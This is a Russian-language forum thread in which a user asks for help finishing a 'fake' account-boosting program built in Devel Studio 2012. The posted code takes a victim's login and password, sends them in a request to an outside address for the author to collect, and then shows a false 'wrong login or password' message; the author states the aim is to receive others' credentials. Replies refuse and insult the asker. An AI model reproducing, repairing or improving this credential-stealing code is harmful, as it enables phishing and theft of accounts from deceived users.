Devel studio 2012

Дмитрий Профи (623), закрыт 11 лет назад
Здравствуйте! Делаю фейк программу через Devel studio 2012. Всё готово, нажимаю "Скомпилировать и запустить проект" и появляется то, что я сделал, ввожу в логин и в пароль что попало, нажимаю "Запустить накрутку", появляется вот это:

Вот весь код:
$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$combobox2 = c('Form1->combobox2')->inText;
$url = "[ссылка заблокирована по решению администрации проекта]";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("Невернно введёт логин или пароль", "Ошибка ввода");

Может кто поможет? Надо чтобы они вводили логин и пароль и это приходило мне на сниффер, могу кинуть весь файл работы, для этого пишите на почту, может кто поможет разобраться
Лучший ответ
ra Высший разум (113245) 11 лет назад
http://otvet.mail.ru/question/83710299/

> Может кто поможет?
Мудакам, делающим фейки и прочую поебень помогут только тут.
Остальные ответы
JonnyBGood Знаток (353) 11 лет назад
лохов разводить будешь?